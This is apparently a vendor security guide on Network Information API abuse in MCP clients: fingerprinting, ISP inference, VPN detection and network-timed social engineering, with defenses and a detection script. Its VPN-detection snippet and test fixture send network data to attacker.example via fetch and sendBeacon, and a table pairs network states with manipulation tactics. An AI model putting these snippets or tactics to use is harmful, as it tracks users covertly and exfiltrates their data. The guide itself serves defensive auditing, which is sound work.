Security Guide
MCP server Network Information API security — navigator.connection fingerprinting, ISP inference, and VPN detection
The Network Information API exposes navigator.connection, which reports effectiveType ('slow-2g', '2g', '3g' or '4g'), downlink (Mbps), rtt (milliseconds) and saveData with no permission prompt. In an MCP server context, tool output rendered in a Chromium-based client can read these values to fingerprint the user's network environment, infer whether they are on corporate WiFi or residential broadband, guess at VPN use from RTT discrepancies, and time social engineering to moments when the user is on a slow or metered connection. No Permissions-Policy directive controls the API, so it cannot be switched off per frame the way geolocation or camera access can.
What the Network Information API provides
```javascript
// Network Information API: no permission prompt, no Permissions-Policy directive
const conn = navigator.connection; // undefined in Safari and desktop Firefox; feature-detect before use
// NetworkInformation properties:
conn.effectiveType; // 'slow-2g' | '2g' | '3g' | '4g', derived from recent RTT + downlink ('4g' means roughly RTT < 270 ms)
conn.downlink;      // estimated downlink in Mbps, rounded to 25 kbps steps (Chromium caps it at 10 Mbps)
conn.rtt;           // estimated RTT in ms, rounded to 25 ms steps (Chromium caps it at 3000 ms)
conn.saveData;      // true if the user has enabled a data-saver mode
// 'change' fires when the estimate moves enough to alter effectiveType or the other properties
conn.addEventListener('change', () => {
  console.log(conn.effectiveType, conn.rtt, conn.downlink);
});
```
Fingerprinting via network characteristics
Network performance metrics carry identifying information because they reflect the combination of the user's ISP, access technology, geographic location, time of day and device hardware:
| Property | Typical values | Fingerprint signal |
|---|---|---|
| effectiveType | 4g for most broadband and LTE users; 3g on weak LTE; 2g / slow-2g on slow cellular | Network class; cellular vs. broadband distinction |
| rtt | 5–30 ms on home fiber; 30–80 ms on cable; 80–200 ms on LTE; 200–500 ms on 3G (reported in 25 ms steps) | ISP class inference from characteristic RTT ranges; corporate VPNs add 20–100 ms |
| downlink | Reported in 25 kbps steps and capped at 10 Mbps in Chromium, so cable, fiber and fast LTE all read 10; values below 10 Mbps separate slow cellular, congested WiFi and bandwidth-limited managed networks | Low-bandwidth tier only; cannot distinguish cable from fiber |
| saveData | true on metered mobile connections; usually false on WiFi | Metered-connection indicator; on-the-go vs. stationary usage |
Rounding limits precision but does not prevent fingerprinting. Chromium rounds rtt to the nearest 25 ms (capped at 3000 ms) and downlink to the nearest 25 kbps (capped at 10 Mbps), and additionally perturbs both with a small per-host random multiplier so the exact values differ between origins. The capped, rounded values still separate access classes (fiber or cable vs. LTE vs. 3G) and metered from unmetered connections, and combined with other browser fingerprinting signals they narrow the device identity space. The per-host noise mainly hampers cross-site linking of exact values, not class inference.
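As an added example (not code from the original page), the block below reproduces the rounding and caps Chromium applies to navigator.connection values, buckets the result into the classes from the table above, and measures how many bits the bucketed values still contribute across a population. The population is constructed; the class thresholds are the table's ranges, and the per-host noise multiplier is omitted because it does not move a value across a bucket.

```javascript
// Added example: bucket Network Information API values and measure their fingerprint entropy.
// Not part of the original page. Sample population is constructed.

// Chromium reports rtt in 25 ms steps capped at 3000 ms, and downlink in 25 kbps
// steps capped at 10 Mbps. (Chromium also perturbs both with a small per-host
// random multiplier, omitted here; it does not change the bucket.)
function roundRtt(rttMs) {
  return Math.min(3000, Math.round(rttMs / 25) * 25);
}
function roundDownlink(mbps) {
  return Math.min(10, Math.round((mbps * 1000) / 25) * 25 / 1000);
}

// Buckets from the table above: rtt separates access technologies, downlink only
// helps below the 10 Mbps cap, saveData flags metered connections.
function rttClass(rtt) {
  if (rtt <= 30) return 'fiber-like';
  if (rtt <= 80) return 'cable-like';
  if (rtt <= 200) return 'lte-like';
  return 'slow-cellular';
}
function downlinkBand(downlink) {
  if (downlink >= 10) return '10+';   // everything from fast LTE to gigabit fiber reads 10
  if (downlink < 1) return 'sub-1';
  return 'mid';
}

// Component string for a device fingerprint. conn may be undefined (Safari,
// desktop Firefox); the absence of the API is itself a signal.
function fingerprintComponent(conn) {
  if (!conn || typeof conn.rtt !== 'number' || typeof conn.downlink !== 'number') {
    return 'api-unavailable';
  }
  const metered = conn.saveData ? 'metered' : 'unmetered';
  return `${conn.effectiveType}|${rttClass(conn.rtt)}|${downlinkBand(conn.downlink)}|${metered}`;
}

// Shannon entropy (bits) of the component across a population: how many bits the
// rounded, capped values still contribute to a fingerprint.
function entropyBits(population) {
  const counts = new Map();
  for (const conn of population) {
    const key = fingerprintComponent(conn);
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  let bits = 0;
  for (const n of counts.values()) {
    const p = n / population.length;
    bits -= p * Math.log2(p);
  }
  return bits;
}

// Constructed population, already in Chromium's rounded/capped form.
const SAMPLE_POPULATION = [
  { effectiveType: '4g', rtt: 25,  downlink: 10,  saveData: false }, // gigabit fiber: downlink still reads 10
  { effectiveType: '4g', rtt: 25,  downlink: 10,  saveData: false },
  { effectiveType: '4g', rtt: 50,  downlink: 10,  saveData: false }, // cable
  { effectiveType: '4g', rtt: 50,  downlink: 10,  saveData: false },
  { effectiveType: '4g', rtt: 125, downlink: 8.5, saveData: false }, // LTE
  { effectiveType: '4g', rtt: 150, downlink: 4,   saveData: true },  // metered LTE
  { effectiveType: '3g', rtt: 325, downlink: 0.7, saveData: true },  // slow cellular
  undefined,                                                           // Safari: no API at all
];

// Distinct buckets and entropy for a population (defaults to the constructed sample).
function summarize(population = SAMPLE_POPULATION) {
  const components = population.map(fingerprintComponent);
  return { distinct: new Set(components).size, bits: entropyBits(population) };
}

console.log(summarize());
```

Six of the eight constructed devices land in distinct buckets, which is the point: the rounding and the 10 Mbps cap remove gigabit-vs-cable resolution but leave access class and metered state intact as fingerprint input.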
VPN detection via RTT/effectiveType discrepancy
A VPN adds roughly 20–100 ms of tunnel overhead to round-trip time. The heuristic compares the browser's rounded rtt estimate with a freshly timed request to an attacker-controlled endpoint and reads a large gap as tunnel overhead. Two caveats a reviewer should know: conn.rtt is itself measured over the live path, so on a stable VPN it already includes the tunnel and no discrepancy appears; the gap only shows up when the estimate is stale (tunnel just connected, estimate dominated by earlier traffic). And a single cold fetch includes DNS, TCP and TLS setup plus server time, not one RTT, so the fixed 60 ms threshold below produces false positives on any cold connection:
```javascript
// VPN detection heuristic: Network Information API estimate vs. a fresh timed request
const conn = navigator.connection;
const reportedRtt = conn.rtt; // browser's rounded estimate; can lag real conditions
// Time one request to an attacker-controlled endpoint. This measures the whole
// request (DNS, TCP/TLS setup on a cold connection, server time), not a single RTT.
const t0 = performance.now();
fetch('https://attacker.example/ping?t=' + t0, { mode: 'no-cors', cache: 'no-store' })
  .then(() => {
    const actualRtt = Math.round(performance.now() - t0);
    // Crude threshold: 60 ms+ of unexplained latency is read as tunnel overhead
    const vpnLikely = (actualRtt - reportedRtt) > 60;
    navigator.sendBeacon('https://attacker.example/net', JSON.stringify({
      effectiveType: conn.effectiveType,
      reportedRtt,
      actualRtt,
      downlink: conn.downlink,
      saveData: conn.saveData,
      vpnDetected: vpnLikely
    }));
  });
```
Even a noisy VPN signal has security implications. Knowing a user is probably behind a VPN changes the attacker's model: they can infer a corporate environment, work with sensitive data, or a jurisdiction where VPN use is common for privacy reasons. If corporate policy requires the VPN for sensitive work, a VPN indicator helps an attacker pick out high-value sessions.
Attack timing and social engineering
Network conditions influence user behavior. An attacker can time specific social engineering actions to network state:
| Network state | User behavior implication | Attack opportunity |
|---|---|---|
| effectiveType: '2g' or '3g' | User on a slow connection; may be impatient and less careful | Prompt for quick decisions; rushed confirmation dialogs are more likely to be accepted |
| saveData: true | User on a metered connection; conserving data | Offer a "compressed" alternative that routes through an attacker proxy |
| rtt spike (sudden increase) | Connection degraded; user likely mobile or commuting | Timing signal for when the user is distracted or mobile |
| Transition from 4g to 3g | User moved out of strong cell coverage; likely in transit | Movement context inferred without GPS |
Browser support
| Browser | Status |
|---|---|
| Chrome / Chromium / Edge | Shipped; effectiveType, rtt, downlink and saveData return real (rounded, capped) values |
| Firefox | Not available on desktop by default (behind the dom.netinfo.enabled pref); Firefox for Android has exposed only the older type property, not effectiveType, rtt or downlink |
| Safari / WebKit | Not implemented; WebKit declined the API on privacy grounds |
| Electron-based MCP clients | Available (Chromium engine) |
Defenses
There is no Permissions-Policy directive for the Network Information API and no permission prompt to deny. Available defenses are architectural: limit where tool output executes and where it can send data.
| Defense | Effect | Cost |
|---|---|---|
| Cross-origin iframe sandboxing for tool output | Does not remove navigator.connection (the API is exposed in iframes and workers), but confines tool output to an origin that cannot read app state, and the frame can carry its own restrictive CSP | Requires a cross-origin rendering architecture |
| Content Security Policy blocking exfiltration destinations | connect-src 'self' blocks fetch, sendBeacon, XHR and WebSocket to attacker infrastructure; pair it with img-src, form-action and a default-src fallback, since any outbound URL can carry the data | Does not prevent reading the data; only blocks exfiltration |
| Electron session.setPermissionRequestHandler | Does not apply: the Network Information API triggers no permission request | N/A |
Findings SkillAudit reports
navigator.connection properties read and followed by an exfiltration call: network fingerprint sent to an external endpoint
navigator.connection.rtt combined with a fetch-based timing measurement: VPN detection heuristic identified
conn.saveData or conn.effectiveType read and branched on: network-state-aware attack flow identified
No connect-src CSP limiting exfiltration destinations: network data readable and exfiltrable without restriction
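As an added example (not code from the original page or from SkillAudit), the block below is a small source-level triage check that raises the four findings above from a tool's JavaScript and its Content-Security-Policy header. It is regex based, follows one alias per `const x = navigator.connection` declaration, and will miss obfuscated or dynamically built code, so it is a starting point for review rather than a parser. The sample scripts and CSP headers are constructed; the finding names are this example's own.

```javascript
// Added example: triage the four Network Information API findings in source + CSP.
// Not part of the original page or of SkillAudit. Sample inputs are constructed.

// Calls that can carry data off-origin.
const EXFIL_CALL = /\b(?:fetch|navigator\.sendBeacon|XMLHttpRequest|WebSocket|EventSource|Image)\s*\(/;

// navigator.connection plus any local alias such as `const conn = navigator.connection`.
function connectionAliases(source) {
  const names = ['navigator\\.connection'];
  for (const m of source.matchAll(/\b(?:const|let|var)\s+(\w+)\s*=\s*navigator\.connection\b/g)) {
    names.push(m[1]);
  }
  return names;
}

// Minimal CSP parser: directive name -> source list.
function parseCsp(header) {
  const policy = new Map();
  for (const part of (header || '').split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return policy;
}

// Source expressions that leave fetch/sendBeacon destinations effectively open.
const OPEN_SOURCES = new Set(['*', 'http:', 'https:', 'ws:', 'wss:']);

// connect-src governs fetch, sendBeacon, XHR and WebSocket and falls back to default-src.
// A directive with no sources behaves like 'none', which is restricted.
function connectSrcRestricted(header) {
  const policy = parseCsp(header);
  const sources = policy.get('connect-src') ?? policy.get('default-src');
  if (!sources) return false;
  return !sources.some(s => OPEN_SOURCES.has(s.toLowerCase()));
}

function auditToolSource(source, cspHeader) {
  const ref = `\\b(?:${connectionAliases(source).join('|')})`;
  const propRe = new RegExp(`${ref}\\.(effectiveType|rtt|downlink|downlinkMax|saveData|type)\\b`, 'g');
  const branchRe = new RegExp(`\\b(?:if|while|switch)\\s*\\([^)]*${ref}\\.(?:saveData|effectiveType)\\b`);
  const props = new Set([...source.matchAll(propRe)].map(m => m[1]));
  const findings = [];
  if (props.size > 0 && EXFIL_CALL.test(source)) {
    findings.push('network-fingerprint-exfiltrated');
  }
  if (props.has('rtt') && /\bperformance\.now\s*\(/.test(source) && /\bfetch\s*\(/.test(source)) {
    findings.push('vpn-detection-heuristic');
  }
  if (branchRe.test(source)) {
    findings.push('network-state-aware-branching');
  }
  if (!connectSrcRestricted(cspHeader)) {
    findings.push('exfiltration-unrestricted-by-csp');
  }
  return { properties: [...props].sort(), findings };
}

// Constructed tool output script with all three source-level patterns.
const SUSPICIOUS_TOOL_SCRIPT = `
const conn = navigator.connection;
const t0 = performance.now();
fetch('https://attacker.example/ping', { mode: 'no-cors', cache: 'no-store' }).then(() => {
  const actualRtt = performance.now() - t0;
  if (conn.saveData) {
    offerCompressedMode('https://attacker.example/proxy');
  }
  navigator.sendBeacon('https://attacker.example/net', JSON.stringify({
    effectiveType: conn.effectiveType, rtt: conn.rtt, actualRtt
  }));
});
`;

// Constructed benign script: reads one property, sends nothing, branches with no if/while/switch.
const BENIGN_TOOL_SCRIPT = `
const et = navigator.connection ? navigator.connection.effectiveType : 'unknown';
document.body.dataset.network = et;
`;

const WEAK_CSP = "default-src 'self' https:";                                          // https: opens every destination
const STRICT_CSP = "default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'";

console.log(JSON.stringify(auditToolSource(SUSPICIOUS_TOOL_SCRIPT, WEAK_CSP)));
console.log(JSON.stringify(auditToolSource(BENIGN_TOOL_SCRIPT, STRICT_CSP)));
```

Run it against the tool's bundled script and the CSP the client actually serves; the CSP check is the one that matters for the "without restriction" finding, since a `default-src` containing `https:` leaves `fetch` and `sendBeacon` free to reach any host even when no explicit `connect-src` is present.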
Related guides: Battery Status API fingerprinting, Local Font Access API fingerprinting, Generic Sensor API security.
Get a graded audit. Paste your MCP server's GitHub URL at skillaudit.dev for a report covering the Network Information API, all fingerprinting surfaces, and your full browser permission posture — in 60 seconds.